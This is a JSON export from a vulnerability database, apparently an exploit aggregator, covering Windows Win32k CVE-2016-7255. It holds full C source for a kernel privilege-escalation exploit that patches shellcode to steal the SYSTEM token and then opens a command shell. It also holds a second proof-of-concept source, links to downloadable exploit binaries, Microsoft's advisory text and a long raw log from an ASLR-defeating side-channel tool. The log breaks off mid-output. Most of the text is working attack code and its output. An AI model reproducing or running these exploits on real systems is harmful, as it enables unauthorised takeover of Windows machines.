// HalpInterruptController_address (dq poi(hal!HalpInterruptController)\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\n }\n\telse if(osversion == 12)\n {\n // the target machine's OS is Windows 2012 R2\n printf(\" [+] Windows 2012 R2\\n\");\n sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS\n sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)\n sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY\n \n overwrite_address = 0xffffffffffd12c70; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)\n overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)\n }\n // in case the OS version is not any of the previously checked versions\n else\n {\n printf(\" [-] Unsupported version\\n\");\n printf(\" [*] Affected 64-bit operating systems\\n\");\n printf(\" [*] Windows 7 SP1 -- cve-2016-7255.exe 7\\n\");\n\t\tprintf(\" [*] Windows 8.1 -- cve-2016-7255.exe 81\\n\");\n\t\tprintf(\" [*] Windows 10 before build 14393 -- cve-2016-7255.exe 10\\n\");\n\t\tprintf(\"\t\t [*] Windows 2012 R2\t\t\t -- cve-2016-7255.exe 12\\n\");\n return -1;\n }\n \n\tprintf(\"My PID is: %d\\n\", GetCurrentProcessId());\n GetUserName(pre_username, &size);\n\tprintf(\"Current Username: %s\\n\", pre_username);\n\tprintf(\"PML4 Self Ref: %llx\\n\", PML4_SELF_REF);\n printf(\"Shellcode stored at: %p\\n\", (void *) &shellcode);\n\tprintf(\"Enter to continue...\\n\");\n\tgetchar();\n\n\tdo\n\t{\n\t\tor_address_value_4((void*)PML4_SELF_REF);\n\t} while (FALSE);\n\n\tPML4_SELF_REF_INDEX = GET_INDEX((UINT64)PML4_SELF_REF);\n\tprintf(\"[*] Self Ref Index: %x\\n\", PML4_SELF_REF_INDEX);\n\tPML4_BASE = ((UINT64)PML4_SELF_REF & (UINT64)0xFFFFFFFFFFFFF000);\n\t\n UINT64 original_pointer = get_OverwriteAddress_pointer(overwrite_address, overwrite_offset);\n\n\tprintf(\"Original OverwriteTarget pointer: %llx\\n\", original_pointer);\n\tDWORD pid = GetCurrentProcessId();\n \n /* Shellcode Patching !! */\n\tchar *p = shellcode;\n\tp += 4; // skip the CLI, PUSHF and MOV RAX bytes\t\n\t*(PVOID *)p = (PVOID)original_pointer; // Patch shellcode1\n\n\tp += 12; // Patch shellcode with original value in the Overwrite address\n\t*(PVOID *)p = (PVOID)(overwrite_address + overwrite_offset);\n\n\tp += 12; // To patch the PID of our process\n\t\n\t*(DWORD *)p = (DWORD)pid;\n \n p += 17;\n *(unsigned char *)p = (unsigned char)sc_KPROCESS;\n \n p += 7;\n *(unsigned int *)p = (unsigned int)sc_APLINKS;\n \n p += 20;\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\n \n p += 20;\n *(unsigned int *)p = (unsigned int)sc_TOKEN;\n \n UINT64 shellcode_va = store_shellcode_in_hal();\n\tprintf(\"[+] w00t: Shellcode stored at: %llx\\n\", shellcode_va);\n\toverwrite_TargetAddress(shellcode_va, overwrite_address, overwrite_offset);\n\t\n\tif (osversion == 7){\n\t\t// Exploit Win7.1\n\t\thNtDll = LoadLibrary(\"ntdll.dll\");\n\n\t\tif (!hNtDll) {\n\t\t\tprintf(\"\\t\\t[-] Failed loading NtDll: 0x%X\\n\", GetLastError());\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\t\n\t\tNtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, \"NtQueryIntervalProfile\");\n\n\t\tif (!NtQueryIntervalProfile) {\n\t\t\tprintf(\"\\t\\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\\n\", GetLastError());\n\t\t\texit(EXIT_FAILURE);\n\t\t}\t\n\t\tNtQueryIntervalProfile(0x1337, &Interval);\n\t}\n\n\t\n\twhile (1) {\n\t\tsize = 256;\n\t\tGetUserName(post_username, &size);\n\t\tif (memcmp(post_username, pre_username, 256) != 0) break;\n\t}\n\tSleep(2000);\n\tsystem(\"cmd.exe\");\n\n\n\treturn 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows Kernel - win32k Denial of Service (MS16-135)", "edition": 1, "published": "2016-11-09T00:00:00", "title": "Microsoft Windows Kernel - win32k Denial of Service (MS16-135)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0075", "CVE-2016-7255"], "modified": "2016-11-09T00:00:00", "id": "EXPLOITPACK:3FDA4C818CF6EA61DD6359696752E123", "href": "", "sourceData": "/*\nSource: https://github.com/tinysec/public/tree/master/CVE-2016-7255\n\nFull Proof of Concept:\n\nhttps://github.com/tinysec/public/tree/master/CVE-2016-7255\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40745.zip\n\n********************************************************************\n Created:\t2016-11-09 14:23:09\n Filename: \tmain.c\n Author:\troot[at]TinySec.net\n Version\t0.0.0.1\n Purpose:\tpoc of cve-2016-0075\n*********************************************************************\n*/\n\n#include <windows.h>\n#include <wchar.h>\n#include <stdlib.h>\n#include <stdio.h>\n\n\n//////////////////////////////////////////////////////////////////////////\n#pragma comment(lib,\"ntdll.lib\")\n#pragma comment(lib,\"user32.lib\")\n\n#undef DbgPrint\nULONG __cdecl DbgPrintEx( IN ULONG ComponentId, IN ULONG Level, IN PCCH Format, IN ... );\nULONG __cdecl DbgPrint(__in char* Format, ...)\n{\n\tCHAR* pszDbgBuff = NULL;\n\tva_list VaList=NULL;\n\tULONG ulRet = 0;\n\t\n\tdo \n\t{\n\t\tpszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0 ,1024 * sizeof(CHAR));\n\t\tif (NULL == pszDbgBuff)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t\tRtlZeroMemory(pszDbgBuff,1024 * sizeof(CHAR));\n\t\t\n\t\tva_start(VaList,Format);\n\t\t\n\t\t_vsnprintf((CHAR*)pszDbgBuff,1024 - 1,Format,VaList);\n\t\t\n\t\tDbgPrintEx(77 , 0 , pszDbgBuff );\n\t\tOutputDebugStringA(pszDbgBuff);\n\t\t\n\t\tva_end(VaList);\n\t\t\n\t} while (FALSE);\n\t\n\tif (NULL != pszDbgBuff)\n\t{\n\t\tHeapFree( GetProcessHeap(), 0 , pszDbgBuff );\n\t\tpszDbgBuff = NULL;\n\t}\n\t\n\treturn ulRet;\n}\n\n\n int _sim_key_down(WORD wKey)\n {\n\t INPUT stInput = {0};\n\t \n\t do \n\t {\n\t\t stInput.type = INPUT_KEYBOARD;\n\t\t stInput.ki.wVk = wKey;\n\t\t stInput.ki.dwFlags = 0;\n\t\t \n\t\t SendInput(1 , &stInput , sizeof(stInput) );\n\n\t } while (FALSE);\n\t \n\t return 0;\n}\n\n int _sim_key_up(WORD wKey)\n {\n\t INPUT stInput = {0};\n\t \n\t do \n\t {\n\t\t stInput.type = INPUT_KEYBOARD;\n\t\t stInput.ki.wVk = wKey;\n\t\t stInput.ki.dwFlags = KEYEVENTF_KEYUP;\n\t\t \n\t\t SendInput(1 , &stInput , sizeof(stInput) );\n\t\t \n\t } while (FALSE);\n\t \n\t return 0;\n}\n\n int _sim_alt_shift_esc()\n {\n\t int i = 0;\n\t \n\t do \n\t {\n\t\t _sim_key_down( VK_MENU );\n\t\t _sim_key_down( VK_SHIFT );\t \n\t\t \n\t\t\n\t\t_sim_key_down( VK_ESCAPE);\n\t\t_sim_key_up( VK_ESCAPE);\n\n\t\t_sim_key_down( VK_ESCAPE);\n\t\t_sim_key_up( VK_ESCAPE);\n\t\t\t \n\t\t _sim_key_up( VK_MENU );\n\t\t _sim_key_up( VK_SHIFT );\t \t \n\t\t \n\t\t \n\t } while (FALSE);\n\t \n\t return 0;\n}\n\n \n\n int _sim_alt_shift_tab(int nCount)\n {\n\t int i = 0;\n\t HWND hWnd = NULL;\n\n\n\t int nFinalRet = -1;\n\n\t do \n\t {\n\t\t _sim_key_down( VK_MENU );\n\t\t _sim_key_down( VK_SHIFT );\t \n\n\n\t\t for ( i = 0; i < nCount ; i++)\n\t\t {\n\t\t\t _sim_key_down( VK_TAB);\n\t\t\t _sim_key_up( VK_TAB);\n\t\t\t \n\t\t\t Sleep(1000);\n\n\t\t }\n\t\n\t\t \n\t\t_sim_key_up( VK_MENU );\n\t\t _sim_key_up( VK_SHIFT );\t \n\t } while (FALSE);\n\t \n\t return nFinalRet;\n}\n\n\n\nint or_address_value_4(__in void* pAddress)\n{\n\tWNDCLASSEXW stWC = {0};\n\n\tHWND\thWndParent = NULL;\n\tHWND\thWndChild = NULL;\n\n\tWCHAR*\tpszClassName = L\"cve-2016-7255\";\n\tWCHAR*\tpszTitleName = L\"cve-2016-7255\";\n\n\tvoid*\tpId = NULL;\n\tMSG\t\tstMsg = {0};\n\n\tdo \n\t{\n\n\t\tstWC.cbSize = sizeof(stWC);\n\t\tstWC.lpfnWndProc = DefWindowProcW;\n\t\tstWC.lpszClassName = pszClassName;\n\t\t\n\t\tif ( 0 == RegisterClassExW(&stWC) )\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\thWndParent = CreateWindowExW(\n\t\t\t0,\n\t\t\tpszClassName,\n\t\t\tNULL,\n\t\t\tWS_OVERLAPPEDWINDOW|WS_VISIBLE,\n\t\t\t0,\n\t\t\t0,\n\t\t\t360,\n\t\t\t360,\n\t\t\tNULL,\n\t\t\tNULL,\n\t\t\tGetModuleHandleW(NULL),\n\t\t\tNULL\n\t\t);\n\n\t\tif (NULL == hWndParent)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\thWndChild = CreateWindowExW(\n\t\t\t0,\n\t\t\tpszClassName,\n\t\t\tpszTitleName,\n\t\t\tWS_OVERLAPPEDWINDOW|WS_VISIBLE|WS_CHILD,\n\t\t\t0,\n\t\t\t0,\n\t\t\t160,\n\t\t\t160,\n\t\t\thWndParent,\n\t\t\tNULL,\n\t\t\tGetModuleHandleW(NULL),\n\t\t\tNULL\n\t\t);\n\t\t\n\t\tif (NULL == hWndChild)\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\t#ifdef _WIN64\n\t\t\tpId = ( (UCHAR*)pAddress - 0x28 ); \n\t\t#else\n\t\t\tpId = ( (UCHAR*)pAddress - 0x14); \n\t\t#endif // #ifdef _WIN64\n\t\t\n\t\tSetWindowLongPtr(hWndChild , GWLP_ID , (LONG_PTR)pId );\n\n\t\tDbgPrint(\"hWndChild = 0x%p\\n\" , hWndChild);\n\t\tDebugBreak();\n\n\t\tShowWindow(hWndParent , SW_SHOWNORMAL);\n\n\t\tSetParent(hWndChild , GetDesktopWindow() );\n\n\t\tSetForegroundWindow(hWndChild);\n\n\t\t_sim_alt_shift_tab(4);\n\t\t\n\t\tSwitchToThisWindow(hWndChild , TRUE);\n\t\t\n\t\t_sim_alt_shift_esc();\n\n\n\t\twhile( GetMessage(&stMsg , NULL , 0 , 0) )\n\t\t{\t\n\t\t\tTranslateMessage(&stMsg);\n\t\t\tDispatchMessage(&stMsg);\n\t\t}\n\t\n\n\t} while (FALSE);\n\n\tif ( NULL != hWndParent )\n\t{\n\t\tDestroyWindow(hWndParent);\n\t\thWndParent = NULL;\n\t}\n\n\tif ( NULL != hWndChild )\n\t{\n\t\tDestroyWindow(hWndChild);\n\t\thWndChild = NULL;\n\t}\n\n\tUnregisterClassW(pszClassName , GetModuleHandleW(NULL) );\n\n\treturn 0;\n}\n\nint __cdecl wmain(int nArgc, WCHAR** Argv)\n{\n\tdo \n\t{\n\t\tor_address_value_4( (void*)0xFFFFFFFF );\n\t} while (FALSE);\n\t\n\treturn 0;\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:33", "description": "\nMicrosoft Windows - Win32k Local Privilege Escalation", "edition": 1, "published": "2019-05-15T00:00:00", "title": "Microsoft Windows - Win32k Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-0803", "CVE-2016-7255"], "modified": "2019-05-15T00:00:00", "id": "EXPLOITPACK:1395F02807B421A9A8880862CED5BAB3", "href": "", "sourceData": "# CVE-2019-0803\nWin32k Elevation of Privilege Poc\n\nReference\n-----------------------------\n(steal Security token) https://github.com/mwrlabs/CVE-2016-7255\n\n\nEDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46920.zip", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2020-08-07T11:48:23", "bulletinFamily": "microsoft", "cvelist": ["CVE-2016-7255"], "description": "An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe update addresses this vulnerability by correcting how the Windows kernel-mode driver handles objects in memory.\n", "edition": 3, "modified": "2016-12-13T08:00:00", "id": "MS:CVE-2016-7255", "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-7255", "published": "2016-12-13T08:00:00", "title": "Win32k Elevation of Privilege Vulnerability", "type": "mscve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-02-18T17:25:55", "description": "Exploit for windows platform in category local exploits", "edition": 1, "published": "2016-11-24T00:00:00", "type": "zdt", "title": "Microsoft Windows Kernel win32k.sys - 'NtSetWindowLongPtr' Privilege Escalation (MS16-13", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7255"], "modified": "2016-11-24T00:00:00", "href": "https://0day.today/exploit/description/26414", "id": "1337DAY-ID-26414", "sourceData": "Complete Proof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40823.zip\r\n \r\nI Know Where Your Page Lives: Derandomizing the latest Windows 10 Kernel - ZeroNights 2016\r\n \r\nRequirements\r\n \r\nIntel Processor (Haswell or newer)\r\nWindows 10 x64\r\nUsage\r\n \r\nRun ASLRSideChannelAttack.exe to get the PML4-Self-Ref entry:\r\n \r\nC:\\Users\\qa\\Desktop>ASLRSideChannelAttack.exe\r\n+] Setting thread affinity to CPU 0\r\n+] Getting all the potential PML4 SelfRef\r\n+] Mapping a page oracle\r\n+] Allocating probing target pages...\r\nAllocation 0: 0000020E339D0000\r\nAllocation 1: 0000020E339E0000\r\nAllocation 2: 0000020E339F0000\r\nAllocation 3: 0000020E33A00000\r\nAllocation 4: 0000020E33A10000\r\n--------------------------\r\n+] Check that Unammped and Mapped values are consistent across several executions!\r\n--------------------------\r\nUnmapped Initial: 256.683746\r\nMapped Initial: 203.692978\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 247.440018\r\nMapped: 202.827560\r\n--------------------------\r\n \r\nPotential SelfRef: FFFF8140A0502810\r\n+] PTE FFFF81010719CE80 looks mapped! - Time: 207.127213\r\n+] PTE FFFF81010719CF00 looks mapped! - Time: 195.239563\r\n+] PTE FFFF81010719CF80 looks mapped! - Time: 192.401382\r\n+] PTE FFFF81010719D000 looks mapped! - Time: 197.297256\r\n+] PTE FFFF81010719D080 looks mapped! - Time: 194.501175\r\n+] PTE FFFF810804020100 looks mapped! - Time: 204.740097\r\n+] Removing 102 from initial array and pushing it into final array\r\nPotential SelfRef: FFFF81C0E0703818\r\n+] PTE FFFF81810719CE80 looks mapped! - Time: 200.837616\r\n+] PTE FFFF81810719CF00 looks mapped! - Time: 207.868774\r\n+] PTE FFFF81810719CF80 looks mapped! - Time: 208.949921\r\n+] PTE FFFF81810719D000 looks mapped! - Time: 202.525726\r\n+] PTE FFFF81810719D080 looks mapped! - Time: 208.673874\r\nTime difference exceed for ffff818804020100, retrying...\r\n+] PTE FFFF818804020100 looks mapped! - Time: 209.071213\r\n+] Removing 103 from initial array and pushing it into final array\r\nTime difference exceed for ffff824120904820, retrying...\r\nPotential SelfRef: FFFF824120904820\r\n+] PTE FFFF82010719CE80 looks mapped! - Time: 198.373642\r\nTime difference exceed for ffff82010719cf00, retrying...\r\n+] PTE FFFF82010719CF00 looks mapped! - Time: 206.213593\r\n+] PTE FFFF82010719CF80 looks mapped! - Time: 210.637344\r\n+] PTE FFFF82010719D000 looks mapped! - Time: 207.820862\r\n+] PTE FFFF82010719D080 looks mapped! - Time: 197.229263\r\n+] PTE FFFF820804020100 looks mapped! - Time: 204.585739\r\n+] Removing 104 from initial array and pushing it into final array\r\nPotential SelfRef: FFFF82C160B05828\r\n+] PTE FFFF82810719CE80 looks mapped! - Time: 216.981003\r\nTime difference exceed for ffff8341a0d06830, retrying...\r\nPotential SelfRef: FFFF8341A0D06830\r\n+] PTE FFFF83010719CE80 looks mapped! - Time: 201.957657\r\n+] PTE FFFF83010719CF00 looks mapped! - Time: 202.023697\r\n+] PTE FFFF83010719CF80 looks mapped! - Time: 212.651016\r\n+] PTE FFFF83010719D000 looks mapped! - Time: 214.013504\r\n+] PTE FFFF83010719D080 looks mapped! - Time: 191.688126\r\n+] PTE FFFF830804020100 looks mapped! - Time: 193.314758\r\n+] Removing 106 from initial array and pushing it into final array\r\nPotential SelfRef: FFFF83C1E0F07838\r\n+] PTE FFFF83810719CE80 looks mapped! - Time: 195.506973\r\n+] PTE FFFF83810719CF00 looks mapped! - Time: 193.697693\r\n+] PTE FFFF83810719CF80 looks mapped! - Time: 208.809097\r\n+] PTE FFFF83810719D000 looks mapped! - Time: 216.298660\r\n+] PTE FFFF83810719D080 looks mapped! - Time: 203.848816\r\n+] PTE FFFF838804020100 looks mapped! - Time: 204.008743\r\n+] Removing 107 from initial array and pushing it into final array\r\nTime difference exceed for ffff89c4e2713898, retrying...\r\nTime difference exceed for ffff8bc5e2f178b8, retrying...\r\nTime difference exceed for ffff8c46231188c0, retrying...\r\nUnmapped Initial: 248.508636\r\nMapped Initial: 207.139847\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 236.360733\r\nMapped: 195.650040\r\n--------------------------\r\n \r\nPotential SelfRef: FFFF8140A0502810\r\n+] PTE FFFF81010719CE80 looks mapped! - Time: 197.312363\r\nPotential SelfRef: FFFF81C0E0703818\r\nTime difference exceed for ffff81810719ce80, retrying...\r\nTime difference exceed for ffff81810719ce80, retrying...\r\nTime difference exceed for ffff81810719ce80, retrying...\r\nTime difference exceed for ffff81810719ce80, retrying...\r\n+] PTE FFFF81810719CE80 looks mapped! - Time: 209.812393\r\nTime difference exceed for ffff81810719cf00, retrying...\r\n+] PTE FFFF81810719CF00 looks mapped! - Time: 207.951645\r\n+] PTE FFFF81810719CF80 looks mapped! - Time: 200.001724\r\n+] PTE FFFF81810719D000 looks mapped! - Time: 197.655167\r\n+] PTE FFFF81810719D080 looks mapped! - Time: 201.667160\r\n+] PTE FFFF818804020100 looks mapped! - Time: 195.728439\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF81C0E0703818 - Index: 103\r\nPML4e: FFFF824120904820 - Index: 104\r\nPML4e: FFFF8341A0D06830 - Index: 106\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff818000000000\r\n-] Erasing 103 from final array\r\nPotential SelfRef: FFFF824120904820\r\n+] PTE FFFF82010719CE80 looks mapped! - Time: 206.883759\r\n+] PTE FFFF82010719CF00 looks mapped! - Time: 208.451019\r\n+] PTE FFFF82010719CF80 looks mapped! - Time: 201.073364\r\n+] PTE FFFF82010719D000 looks mapped! - Time: 203.052826\r\n+] PTE FFFF82010719D080 looks mapped! - Time: 194.115143\r\n+] PTE FFFF820804020100 looks mapped! - Time: 198.158585\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF824120904820 - Index: 104\r\nPML4e: FFFF8341A0D06830 - Index: 106\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff820000000000\r\n-] Erasing 104 from final array\r\nPotential SelfRef: FFFF8341A0D06830\r\n+] PTE FFFF83010719CE80 looks mapped! - Time: 200.405823\r\n+] PTE FFFF83010719CF00 looks mapped! - Time: 201.572525\r\n+] PTE FFFF83010719CF80 looks mapped! - Time: 193.538040\r\n+] PTE FFFF83010719D000 looks mapped! - Time: 196.066254\r\n+] PTE FFFF83010719D080 looks mapped! - Time: 189.007034\r\n+] PTE FFFF830804020100 looks mapped! - Time: 197.613953\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF8341A0D06830 - Index: 106\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff830000000000\r\n-] Erasing 106 from final array\r\nPotential SelfRef: FFFF83C1E0F07838\r\n+] PTE FFFF83810719CE80 looks mapped! - Time: 200.655380\r\nTime difference exceed for ffff83810719cf00, retrying...\r\nTime difference exceed for ffff83810719cf00, retrying...\r\nUnmapped Initial: 232.123840\r\nMapped Initial: 196.420654\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 234.845581\r\nMapped: 187.862518\r\n--------------------------\r\n \r\nPotential SelfRef: FFFF8140A0502810\r\n+] PTE FFFF81010719CE80 looks mapped! - Time: 197.432938\r\n+] PTE FFFF81010719CF00 looks mapped! - Time: 191.731766\r\nTime difference exceed for ffff81010719cf80, retrying...\r\nTime difference exceed for ffff81010719cf80, retrying...\r\nTime difference exceed for ffff81010719cf80, retrying...\r\n+] PTE FFFF81010719CF80 looks mapped! - Time: 201.003784\r\n+] PTE FFFF81010719D000 looks mapped! - Time: 194.332733\r\n+] PTE FFFF81010719D080 looks mapped! - Time: 200.211182\r\n+] PTE FFFF810804020100 looks mapped! - Time: 199.812225\r\nPML4e: FFFF8140A0502810 - Index: 102\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff810000000000\r\nTime difference exceed for ffff810000000000, retrying...\r\n-] Erasing 102 from final array\r\nTime difference exceed for ffff83c1e0f07838, retrying...\r\nPotential SelfRef: FFFF83C1E0F07838\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nUnmapped Initial: 230.247162\r\nMapped Initial: 198.023987\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 235.923035\r\nMapped: 191.605301\r\n--------------------------\r\n \r\nTime difference exceed for ffff83c1e0f07838, retrying...\r\nTime difference exceed for ffff83c1e0f07838, retrying...\r\nPotential SelfRef: FFFF83C1E0F07838\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nTime difference exceed for ffff83810719ce80, retrying...\r\nUnmapped Initial: 258.041046\r\nMapped Initial: 210.309753\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 238.757538\r\nMapped: 203.896240\r\n--------------------------\r\n \r\nPotential SelfRef: FFFF83C1E0F07838\r\n+] PTE FFFF83810719CE80 looks mapped! - Time: 210.036102\r\n+] PTE FFFF83810719CF00 looks mapped! - Time: 199.200836\r\n+] PTE FFFF83810719CF80 looks mapped! - Time: 204.575333\r\n+] PTE FFFF83810719D000 looks mapped! - Time: 197.218445\r\n+] PTE FFFF83810719D080 looks mapped! - Time: 203.334763\r\n+] PTE FFFF838804020100 looks mapped! - Time: 203.243607\r\nPML4e: FFFF83C1E0F07838 - Index: 107\r\nKNOWN_UNMAPPED PTE: ffff838000000000\r\n-] Erasing 107 from final array\r\nPotential SelfRef: FFFF82C160B05828\r\n+] PTE FFFF82810719CE80 looks mapped! - Time: 201.889221\r\n+] PTE FFFF82810719CF00 looks mapped! - Time: 201.679138\r\n+] PTE FFFF82810719CF80 looks mapped! - Time: 204.281006\r\n+] PTE FFFF82810719D000 looks mapped! - Time: 209.909943\r\n+] PTE FFFF82810719D080 looks mapped! - Time: 202.795639\r\n+] PTE FFFF828804020100 looks mapped! - Time: 196.754044\r\n+] Removing 105 from initial array and pushing it into final array\r\nTime difference exceed for ffff884422110880, retrying...\r\nTime difference exceed for ffff884422110880, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff8ec763b1d8e8, retrying...\r\nTime difference exceed for ffff90c864321908, retrying...\r\nUnmapped Initial: 257.754272\r\nMapped Initial: 207.903702\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 247.145935\r\nMapped: 207.792923\r\n--------------------------\r\n \r\nPotential SelfRef: FFFF82C160B05828\r\n+] PTE FFFF82810719CE80 looks mapped! - Time: 208.554092\r\n+] PTE FFFF82810719CF00 looks mapped! - Time: 206.517715\r\n+] PTE FFFF82810719CF80 looks mapped! - Time: 216.576614\r\n+] PTE FFFF82810719D000 looks mapped! - Time: 213.698837\r\n+] PTE FFFF82810719D080 looks mapped! - Time: 210.162796\r\n+] PTE FFFF828804020100 looks mapped! - Time: 208.765045\r\nPML4e: FFFF82C160B05828 - Index: 105\r\nKNOWN_UNMAPPED PTE: ffff828000000000\r\n-] Erasing 105 from final array\r\n-] Removing 100 as it seems to be unmapped\r\n-] Removing 101 as it seems to be unmapped\r\n-] Removing 108 as it seems to be unmapped\r\n-] Removing 109 as it seems to be unmapped\r\n-] Removing 10a as it seems to be unmapped\r\n-] Removing 10b as it seems to be unmapped\r\n-] Removing 10c as it seems to be unmapped\r\n-] Removing 10d as it seems to be unmapped\r\nTime difference exceed for ffff8743a1d0e870, retrying...\r\n-] Removing 10e as it seems to be unmapped\r\n-] Removing 10f as it seems to be unmapped\r\n-] Removing 110 as it seems to be unmapped\r\nTime difference exceed for ffff88c462311888, retrying...\r\n-] Removing 111 as it seems to be unmapped\r\n-] Removing 112 as it seems to be unmapped\r\n-] Removing 113 as it seems to be unmapped\r\nTime difference exceed for ffff8a45229148a0, retrying...\r\n-] Removing 114 as it seems to be unmapped\r\n-] Removing 115 as it seems to be unmapped\r\n-] Removing 116 as it seems to be unmapped\r\n-] Removing 117 as it seems to be unmapped\r\nTime difference exceed for ffffbc5e2f178bc0, retrying...\r\nTime difference exceed for ffffbc5e2f178bc0, retrying...\r\nTime difference exceed for ffffe8f47a3d1e88, retrying...\r\nPotential SelfRef: FFFFF67B3D9ECF60\r\n+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.963379\r\n+] PTE FFFFF6010719CF00 looks mapped! - Time: 212.917694\r\n+] PTE FFFFF6010719CF80 looks mapped! - Time: 207.448502\r\n+] PTE FFFFF6010719D000 looks mapped! - Time: 203.673920\r\n+] PTE FFFFF6010719D080 looks mapped! - Time: 206.782059\r\n+] PTE FFFFF60804020100 looks mapped! - Time: 211.636246\r\n+] Removing 1ec from initial array and pushing it into final array\r\nUnmapped Initial: 233.678802\r\nMapped Initial: 214.496124\r\n--------------------------\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n+] Measures are not consistent yet...\r\n--------------------------\r\nUnmapped: 250.585373\r\nMapped: 213.339661\r\n--------------------------\r\n \r\nPotential SelfRef: FFFFF67B3D9ECF60\r\n+] PTE FFFFF6010719CE80 looks mapped! - Time: 201.419174\r\n+] PTE FFFFF6010719CF00 looks mapped! - Time: 199.196457\r\n+] PTE FFFFF6010719CF80 looks mapped! - Time: 210.779861\r\n+] PTE FFFFF6010719D000 looks mapped! - Time: 199.642334\r\n+] PTE FFFFF6010719D080 looks mapped! - Time: 200.348160\r\n+] PTE FFFFF60804020100 looks mapped! - Time: 204.036926\r\nPML4e: FFFFF67B3D9ECF60 - Index: 1ec\r\nKNOWN_UNMAPPED PTE: fffff60000000000\r\nReal PML4 SelfRef Found: fffff67b3d9ecf60\r\nLeft in Potential Array: ffff8c46231188c0\r\nLeft in Potential Array: ffff8cc6633198c8\r\nLeft in Potential Array: ffff8d46a351a8d0\r\nLeft in Potential Array: ffff8dc6e371b8d8\r\nLeft in Potential Array: ffff8e472391c8e0\r\nLeft in Potential Array: ffff8ec763b1d8e8\r\nLeft in Potential Array: 